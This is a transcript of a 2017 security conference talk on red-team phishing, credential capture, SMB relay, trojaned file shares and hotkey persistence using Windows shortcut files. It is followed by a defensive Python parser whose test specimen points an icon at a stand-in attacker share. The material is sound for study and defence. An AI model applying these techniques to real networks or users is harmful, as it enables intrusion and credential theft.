
T1 12 A "Shortcut" to Red Teaming, Theo Papadopoulos

BSides Athens · 2017 · 26:08 · Published 2017-10
About this talk
Security BSides Athens 2017 (24/Jun/2017)

Hi everybody, thank you very much for being here. I'm really humbled. I will talk about red teaming, in particular red teaming with this file type called LNK or Windows shortcut files, as you know. A little bit about myself. I'm a senior security consultant in Cross-Digital Science. I know we have a really good name. I'm based in London. I'm a red and purple teamer.

Mostly, most of the assessments I do, they are either infrastructure tests or red teaming. And I've been in the Greek scene as an active/passive member since the early 2000s. I don't know if a couple of you remember these channels, but they're really unique and old.

So in this presentation I want to talk about four phases of red teaming, in particular phishing campaigns or the initial foothold, how to get the initial foothold; credential harvesting after we gain the initial foothold; lateral movement, how to spread inside the network; and a couple of tips about persistence. But I want to speak about all these four things by using and utilizing Windows shortcut files.

So there is a trend in phishing campaigns lately, and this is... they are using old ways, like macros. Macros are active for the past 10-15 years, I don't even know. They factor them with good tricks, such as Bowser, for example. You can see all these crazy new attacks and all these crazy compromises lately. But because of the fact that these techniques are old, and especially the macros, they are very, lately they are very famous attacks. We try, from the offensive side, we are trying to innovate in a way or try to advance and get out of the normal. Mostly 95% of the attacks are macro-based right now, so in this talk I would describe a new, not a new, an old

slash new attack with OLE objects. So I call this the equation of love. It's a Word file, PowerShell, and you get shells, I assume. So I'm using for this OLE objects as a lure. The benefit you get is you're not getting the usual macro warning message, which is really, really... It only shows you a security dialogue saying do you want to open the object or not. In my opinion, I think you can create more of these lures without PowerShell. We love PowerShell because of memory execution. Easy to script and very easy to extend. And I am using LNK files, a shortcut file, as a payload medium. So let me talk about lures. This is a lure I used in a

red teaming engagement. You can see the text is blurred in the background. You have like a dialogue, the text describing the document, that says here document, you have to double click the lock icon to open the document. But I want you to focus on small and little things. For example, the file icon. You have a document file. This is the payload. This is the delivery file to send to the client. So it has document.hash value. But you can see here .lnk. It's normal for a user to think that the file name is truncated, and this is just a random hash value. But the thing is that when we embed an OLE object inside of a presentation, you get this message. When the user is trying to activate the

OLE object, you get this message saying you have the file name of the embedded object. And the thing is that because we embedded a shortcut file, which has the extension .lnk, I name the OLE object document dot hash value, dot dot, which means .lnk. It is the exact same file name in the file. So when the user sees that, he's like, yeah, sure, I can open the file. This is why I opened it in the first place. So we can see that we can convince him. I got a very good success rate in this campaign, let's say. And I want to show you something. You see this signature over here? Obviously, I've changed that for this presentation, but I found the signature of the

CEO online. So I've blurred the signature, and I guess it was more convincing for the people to obey. Oh, I had a logo of the company as well.

Let's talk about PowerShell. In PowerShell you can use -c or -command and you can do the whole script code. So essentially you can run code with a single command line. And I'm using a shortcut file. How do I use that? So I'm using as a target application, I'm using the full path of PowerShell and as an argument I'm using -c and the command I want to run. So essentially, the shortcut with the parameter of PowerShell, you could execute the code. Now, there are some limitations to that. For example, the target is the arguments. The user interface of Windows is limited to 381 bytes. You cannot type more than that in here, the target. But the actual limit, programmatically,

in an LNK file, it's 1019 bytes. So you can either use

or you can use PowerShell to create an LNK file and you are limited again to this size of whatever you can put here. So in essence we cannot put a lot. You cannot code your own malware and put it there as code because you are limited to that. Another limitation is that when you call PowerShell from a Windows shortcut it invokes PowerShell from

So, the attackers continue now to use staged payloads. So, what does that mean? You have an attacker sending an email to the user with an OLE object and an LNK file. The user opens the document and clicks on the OLE object. So you have the LNK file acting as a stager, which communicates with another host and downloads. So it uses PowerShell in order to communicate with another host and downloads the malware back to the user and then executes it. I don't know if it's very hard to see that, but it's, in essence, it uses Net.WebClient to download the file and it automatically puts that in memory and you use that process and the payload that you just found with. But the thing is that

you can obviously use different things like regsvr32 or rundll32 instead of PowerShell, but we love PowerShell. After that, after the execution of the malware, it establishes a communication channel back to our C2 server. The thing is that we have a couple of issues with staged payloads. First of all, the noise.

Because it's staged, it will request another file from another server. So it produces more noise than a stageless payload in some sense. And the other thing is the staging. As pen testers and as red teamers, we hate staging. You have to really put so much effort in staging that the whole campaign can fail. And you invested five days in staging, and you fail. So you try to reduce staging as much as possible. This is why I created the LNK2OLE Injector. So what that does,

what I do with that is get the full payload and append it at the end of the shortcut file. And then I'm using PowerShell, I'm calling PowerShell and I'm doing ReadAllBytes on the shortcut itself. And I'm getting the payload that I've embedded in the shortcut file and I'm invoking it in memory straight away. The problem is, when you call it via a shortcut file, it doesn't know where the file is. Because obviously PowerShell is running from its current directory. Thankfully, Office, when anybody embeds an OLE object inside Office, and when the user extracts the OLE object, it goes automatically to the user profile AppData and Temp folder. So thank you very much, Lawrence, for that. Because now I know exactly where my

embedded object is, and I can read my code and invoke it. So the thing is that in the shortcut arguments we have 309 bytes and this way we can encapsulate a whole payload inside the file and we are inside the limitations of the LNK file but we can invoke whatever form we want in there. This was really cool. I will show you a quick demo that we need

Okay, so I thought I had a failure. But essentially I have a payload generated with Cobalt Strike and I'm using all the other. So what I did is I appended that shellcode at the end of the file. And the thing is that I put some extra code here. You can't see anything, but I put some extra code in order to share with my phishing campaign. Later, what that piece of code does. So if you remember the previous lure, I was asking the user to click on the file in order to open a new secure document. So essentially this piece of code does that. So you have the document, I'm fast forwarding the process of creating, if you guys want, I can give you the demos

later, but this is essentially how I'm creating the lure. I'm using, because of the fact that when you put an OLE object there, there's an icon, I've created a transparent icon and put it as a motherly inside the document. This is my lure. So I'm putting it there, going to the background. Come on, faster. Yes. So this is the finalized document.

down, click on it.

Yes, yes of course I want to open the document, the secure document, clicks open, my Word is closing down and you get the secure document opened up and of course you get a shell as well, if you may, yes, that's a shell. The way I've encapsulated the payload inside the shortcut, I've encapsulated, weaponized the payload as well to do some more functions like shutting down Word, then open up the secure document. And it was pretty convincing. Of course, it wasn't, you know, this is the secure document to the user, but it was something else that they were expecting. Let me try and get back to the presentation.

I want to talk about an impossible scenario that we've never seen in our clients, and so if you are a consultant you have never seen that as well: writable network file shares, right? So what can you do with that? So essentially you can plant a file inside an SMB share and you can point the icon file of the LNK file to

another malicious SMB auth server. This way, whenever someone is trying to access a folder, an SMB share, whatever, explorer.exe is trying to render the icon file and because of the fact that the icon file is on your malicious SMB auth server, you get their NetNTLM credentials back.

But I've been in a case where we couldn't crack hashes, we couldn't do anything. So we used, I don't know how many of you are familiar with SMB relay? Okay. So SMB relay is a technique. For example, you have a shortcut file that points the user back to you via SMB or RPC. Like the LNK file I was telling you. Automatically, his

Windows is trying to authenticate with the user's credentials into my fake SMB auth server. With SMB relay, you can say that I'm sitting here in the middle. So imagine that this is the LNK file. The user has just accessed the LNK file. Not accessed, but just rendered it through explorer.exe. So there is an SMB request back to the attacker. And this is me, my fake SMB server. And what I'm doing now is targeting another server that I'm going to get access to. And I'm forwarding the attacker's request back to the server, to the server that I'm targeting. So the target here says, OK, get the challenge, an NTLM challenge, in order to verify that you are the person

that you're telling. So the attacker gets the NTLM challenge and forwards that back to the user. So the user gets a challenge and says, OK, I don't want a challenge. No, actually, I have requested here. I did an SMB request, so now I'm expecting a challenge. So it processes the challenge and sends the response back to us. So we get the response and we forward it back to the attacking server. So the attacking server says, yeah, that's pretty hard to see, all I want from you, you are the one that you are telling me. You are the user that you are impersonating. So he sends us a message saying, okay, I really want to get access to my resources. So the attacker

here, he can say, you know, screw it, I don't want anything from you. So what the attacker did is established a channel, a trust channel, between the server that he was targeting and himself, and doesn't know the user's password at all. And this happened, you can see here in one of my recent engagements. It was the same case, we planted an LNK file, you can't see it in months, I assume, but here it is. If you guys know the Responder MultiRelay tool, it's a naughty tool, you can play around with it. So Responder is the fake SMB server, and MultiRelay is the tool that enables you to do SMB relay attacks. The server didn't have SMB signing, so we were able to relay

the traffic back. Got another mistake on the host, you know, we can't see much. And, okay, I haven't disclosed some stuff, obviously. So we just used WMI to get back to that server, and that was pretty much it, it was game over. But everything started with that little Windows shortcut file. What else can we do? I want to introduce another script that I wrote, which is called LNK Doc Injector. So what I did is that I noticed when I was doing red teaming engagements in clients, I noticed that there were a couple of people that were accessing specific Word documents because this is what they do, that's their work. So I thought I could find these Word

documents inside SMB shares that I conveniently have access or write access to. So I thought of these people, they are using their data, they work on these documents. So I'm targeting a specific group, let's say, in the finance department. I know that these people will import, may not have the same document, for example. So I created a script that does a recursive search inside an SMB server and finds the famous files, the files that have been accessed in the past day or in the past two days, so you can configure it however you want. So what I'm doing is creating a shortcut file with the same exact file name as the original file, the same exact size because I'm adding padding to the end of

the file, and the same exact icon. Inside the shortcut file, I showed you earlier that I got an embedded payload. So my extra code, except of course getting a shell, was to invoke the original file. So essentially, the user was just double clicking on the file. He was getting the original file. He was saving stuff from his original file, but I was getting a shell from him.

So let me show you that really quick.

I do not like macros.

So this is a user from the internal department. He has his files on the file server. He loves working on that specific file.

So right here, I have compromised one of the systems inside the company and I can see that I have write access into the file as well.

So what I'm doing, I'm doing a

So I'm telling

you the script to search the files in the SMB share that have been used in the last day. So it found three files and it found the file as your original, the user that I'm targeting was accessing. So

I'm telling the script to infect with that specific payload. The file share. So this is done. It added the padding. It added the icon files and all that. So the user is opening again the file. He's getting his original file back. And I'm getting a shell, you can see here. So that was quite useful. Also I have an option to disinfect the files. But in essence you don't actually, you don't infect anything. You're just creating shortcut files and hiding the original files. It was pretty useful in an exercise we had. So regarding persistence,

we've noticed that if... so in a shortcut file you can have hotkeys assigned in your shortcuts, but the thing is that Windows allows you by default to use only Ctrl and Alt for a hotkey. But the thing is that if you create programmatically a shortcut file, you can assign whatever hotkey you like, actually everything but the Win key. So in this case, I thought, OK, this was very interesting, actually, in VDI kinds of environments, because VDI is to have a user logging in a system that is fresh. So we found some roaming profiles that we had access to. So we've planted an LNK file inside the user's desktop. And we planted it in a way that the icon was transparent, there was no

title at all. It was really sneaky. And what we did, we used Ctrl+V as a hotkey. And the thing is that when Explorer.exe starts, it hooks this shortcut globally into the system. So whenever the user would press Ctrl+V, our payload would execute and add a payload to first spawn the shell back to us and then do the actual function, which was paste, for the user. We ended up having like a pattern of sessions from the same user, that he lost that key, but it was a really fun way to persist actually. There's another demo I'm going to show you. I don't know if I'm in time.

initialization of the script. So you can see, actually, we simulate that the user restarted his system by killing explorer.exe.

So you can see here that the simulator is doing a copy of this thing. And then by clicking paste you have a really quick PowerShell window going into the taskbar, minimized, and then you get the text pasted. But we get a shell as well from that. That was it. Any questions guys?
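A defender-side companion to the four tricks walked through in this talk, added here as an example and not part of the talk or the speaker's scripts: a small triage parser for the MS-SHLLINK (.lnk) layout that reports a PowerShell launcher in the link's StringData, an icon location on a remote share, bytes appended after the terminal ExtraData block, and a programmatically set hotkey. The specimen shortcut is constructed inside the block; `attacker-host` and `<placeholder>` are stand-ins, and the LinkInfo structure is skipped over rather than decoded.

```python
import struct
# Added example, not from the talk: triage parser for MS-SHLLINK (.lnk) files; the specimen is constructed inline.
HDR, CLSID = 76, bytes.fromhex("0114020000000000c000000000000046")   # header size; {00021401-...-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = [1 << i for i in range(8)]
STRINGS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
           (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))      # StringData order per spec

def parse_lnk(data):
    """Return the hotkey, the StringData fields and how many bytes follow the terminal block."""
    if data[:4] != struct.pack("<I", HDR) or data[4:20] != CLSID:
        raise ValueError("not a shell link file")
    flags, *_, hotkey = struct.unpack_from("<IIQQQIIIH", data, 20)   # LinkFlags ... HotKey
    pos = HDR
    if flags & HAS_IDLIST:                      # LinkTargetIDList: u16 size, then that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                    # LinkInfo: u32 total size including itself (not decoded here)
        pos += struct.unpack_from("<I", data, pos)[0]
    info, (width, enc) = {"hotkey": hotkey}, ((2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252"))
    for bit, name in STRINGS:                   # StringData: u16 char count, then the characters
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            info[name] = data[pos + 2:pos + 2 + count * width].decode(enc)
            pos += 2 + count * width
    while pos + 4 <= len(data) and (size := struct.unpack_from("<I", data, pos)[0]) >= 4:
        pos += size                             # ExtraData block; its size includes the 4-byte prefix
    info["trailing_bytes"] = max(0, len(data) - pos - 4)   # past the terminal block: not part of the link
    return info

def triage(data):
    info, findings = parse_lnk(data), []
    cmd = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    if "powershell" in cmd or " -c " in cmd or " -enc" in cmd:
        findings.append("powershell launcher")
    if info.get("icon_location", "").startswith("\\\\"):   # Explorer fetches the icon just to render it
        findings.append("icon on remote share (NetNTLM leak)")
    if info["trailing_bytes"]:
        findings.append("appended data (%d bytes)" % info["trailing_bytes"])
    if info["hotkey"]:                                      # high byte = modifiers, low byte = virtual key
        mods = [m for bit, m in ((1, "Shift"), (2, "Ctrl"), (4, "Alt")) if info["hotkey"] >> 8 & bit]
        findings.append("hotkey %s+%s" % ("+".join(mods), chr(info["hotkey"] & 0xFF)))
    return findings

def build_sample():
    """Constructed specimen with all four indicators; attacker-host and <placeholder> are stand-ins."""
    s = lambda text: struct.pack("<H", len(text)) + text.encode("utf-16-le")   # one StringData entry
    header = struct.pack("<I16sIIQQQIIIHHII", HDR, CLSID, HAS_RELPATH | HAS_ARGS | HAS_ICON | IS_UNICODE,
                         0, 0, 0, 0, 0, 0, 1, 0x0256, 0, 0, 0)    # hotkey 0x0256 = Ctrl (0x02) + 'V' (0x56)
    body = s(r"..\WindowsPowerShell\v1.0\powershell.exe") + s("-c <placeholder>") + s(r"\\attacker-host\share\icon.ico")
    return header + body + b"\x00\x00\x00\x00" + b"<appended bytes>"   # terminal block, then stowed bytes
```

Run it over a directory of shortcuts with `triage(open(path, "rb").read())`; a non-empty result is a prompt for review, not a verdict, since legitimate shortcuts set hotkeys and UNC icon paths too.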